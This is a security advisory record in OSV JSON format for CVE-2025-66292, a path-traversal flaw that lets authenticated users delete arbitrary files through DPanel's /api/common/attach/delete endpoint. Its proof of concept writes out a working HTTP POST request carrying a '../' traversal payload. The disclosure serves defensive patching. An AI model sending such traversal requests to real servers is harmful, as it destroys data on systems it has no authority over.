{"schema_version":"1.7.3","id":"GHSA-vh2x-fw87-4fxq","published":"2026-01-15T17:58:42Z","modified":"2026-02-03T02:56:24.035814Z","aliases":["CVE-2025-66292","GO-2026-4318"],"summary":"DPanel has an arbitrary file deletion vulnerability in /api/common/attach/delete interface","details":"### Summary\nDPanel has an arbitrary file deletion vulnerability in the `/api/common/attach/delete` interface. Authenticated users can delete arbitrary files on the server via path traversal.\n\n### Details\nWhen a user logs into the administrative backend, this interface can be used to delete files. The vulnerability lies in the `Delete` function within the `app/common/http/controller/attach.go` file.\n\nThe `path` parameter submitted by the user is directly passed to `storage.Local{}.GetSaveRealPath` and subsequently to `os.Remove` without proper sanitization or checking for path traversal characters (`../`).\n\nThe vulnerable code snippet:\n<img width=\"487\" height=\"363\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b811de6f-1df1-49f3-af78-ea77bc420804\" />\n\n\nAnd the helper function in `common/service/storage/local.go` uses `filepath.Join`, which resolves `../` but does not enforce a chroot/jail:\n<img width=\"564\" height=\"66\" alt=\"image\" src=\"https://github.com/user-attachments/assets/84d5a4f7-9054-4e1d-aa6b-6b50c80ba277\" />\n\n### PoC\n1. Log in to the DPanel dashboard to obtain the `Authorization` token.\n2. Send a POST request to delete a file (e.g., `/tmp/1.txt` inside the container).\n\n**Request:**\n```http\nPOST /dpanel/api/common/attach/delete HTTP/1.1\nHost: target-ip:8807\nAuthorization: Bearer <YOUR_TOKEN>\nContent-Type: application/x-www-form-urlencoded\n\npath=../../../../../../../../tmp/1.txt\n```\n\n<img width=\"1600\" height=\"940\" alt=\"image\" src=\"https://github.com/user-attachments/assets/40e4d3cb-57f7-4a4e-adcc-a9503af762be\" />\n<img width=\"346\" height=\"191\" alt=\"image\" src=\"https://github.com/user-attachments/assets/756c0891-e61b-434c-9386-6e701bbb1a97\" />\n<img width=\"1310\" height=\"885\" alt=\"image\" src=\"https://github.com/user-attachments/assets/31c883c2-725e-4618-977c-35fe19adafb1\" />\n<img width=\"1009\" height=\"209\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2641fdfb-6d73-4940-bd92-44d748e0e6b7\" />\n<img width=\"1265\" height=\"876\" alt=\"image\" src=\"https://github.com/user-attachments/assets/14c67ec8-ec37-4820-90be-a24f58819020\" />","affected":[{"package":{"name":"github.com/donknap/dpanel","ecosystem":"Go","purl":"pkg:golang/github.com/donknap/dpanel"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.9.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-vh2x-fw87-4fxq/GHSA-vh2x-fw87-4fxq.json"}}],"references":[{"type":"WEB","url":"https://github.com/donknap/dpanel/security/advisories/GHSA-vh2x-fw87-4fxq"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66292"},{"type":"WEB","url":"https://github.com/donknap/dpanel/commit/cbda0d90204e8212f2010774345c952e42069119"},{"type":"PACKAGE","url":"https://github.com/donknap/dpanel"},{"type":"WEB","url":"https://github.com/donknap/dpanel/releases/tag/v1.9.2"}],"database_specific":{"cwe_ids":["CWE-22"],"github_reviewed":true,"github_reviewed_at":"2026-01-15T17:58:42Z","nvd_published_at":"2026-01-15T17:16:04Z","severity":"HIGH"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"}]}